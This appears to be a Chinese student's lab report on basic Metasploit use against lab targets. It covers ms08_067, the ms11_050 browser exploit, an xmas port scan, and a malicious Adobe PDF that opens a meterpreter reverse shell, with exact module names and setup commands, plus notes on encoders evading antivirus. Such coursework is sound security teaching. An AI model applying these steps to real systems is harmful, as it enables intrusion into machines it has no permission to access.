MSF基础应用

一个主动攻击，如ms08_067

• 启动msf

• search ms08_067，查找相应的漏洞，查询可攻击的模块。

• 根据上述漏洞的模块use exploit/windows/smb/ms08_067_netapi选择该模块

• 接下来查看相应的攻击载荷，首先我们可以查看可使用的载荷

• 想要获取靶机的shell，所以可以选择以上攻击载荷

• 先查看 options 发现需要设置的信息

• 设置攻击主机ip（LHOST）、远程主机ip（RHOST）以及设置相应平台的编号：set target 0

• 发起渗透攻击，exploit，成功

一个针对浏览器的攻击，如ms11_050

• 查找相关漏洞信息

• 找到模块后，可以通过info指令查看模块详细信息

• 设置如下信息

• 在浏览器输入以下信息

• 回头看 发现试了很多次

成功应用任何一个辅助模块——xmas

• 一种更为隐蔽的扫描方式，通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤。

• 端口扫描分为TCP SYN、TCP connect、秘密扫描、以及其他扫描，xmas属于端口扫描中的秘密扫描的一种。

• 先查看需要设置的信息

• 设置端口及RHOST，限制了端口1—100

• run发现，open | filtered 无法确定端受限口是开放还是被防火墙设置成被过滤， 可能开放的端口不响应。

• XMAS扫描原理和NULL扫描的类似，将TCP数据包中的ACK、FIN、RST、SYN、URG、PSH标志位置1后发送给目标主机。在目标端口开放的情况下，目标主机将不返回任何信息。

一个针对客户端的攻击，如Adobe

• 首先设置显示隐藏文件夹

• 输入命令use exploit/windows/fileformat/adobe_cooltype_sing，进入该漏洞模块的使用。

• 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

• 设置 FILENAME 、LPORT、LHOST

• 输入exploit,生成pdf文件，并可以看到pdf所在文件夹，将pdf复制到靶机里。

• 使用命令back退出当前模块，并使用use exploit/multi/handler新建一个监听模块。设置相同的端口如上。

• 使用命令exploit开始攻击，在xp中打开pdf。

• 成功。第一次由于超时未响应，所以失败了。第二次就OK了。

• 可在靶机中查看链接，发现连接信息。

实验后回答问题

• 什么是exploit？

exploit就是背着payload去攻击，起到运载作用

• 什么是payload？

payload则为攻击负荷

• 什么是encode？

encode为编码器，使其得到伪装，防止被查杀，打掩护用到的。

实验总结与体会

老师我发誓我写了。。写着写着熄灯了，我还拍照留了证据当时。。因为我怕没保存上。。咋可能不写啊！！！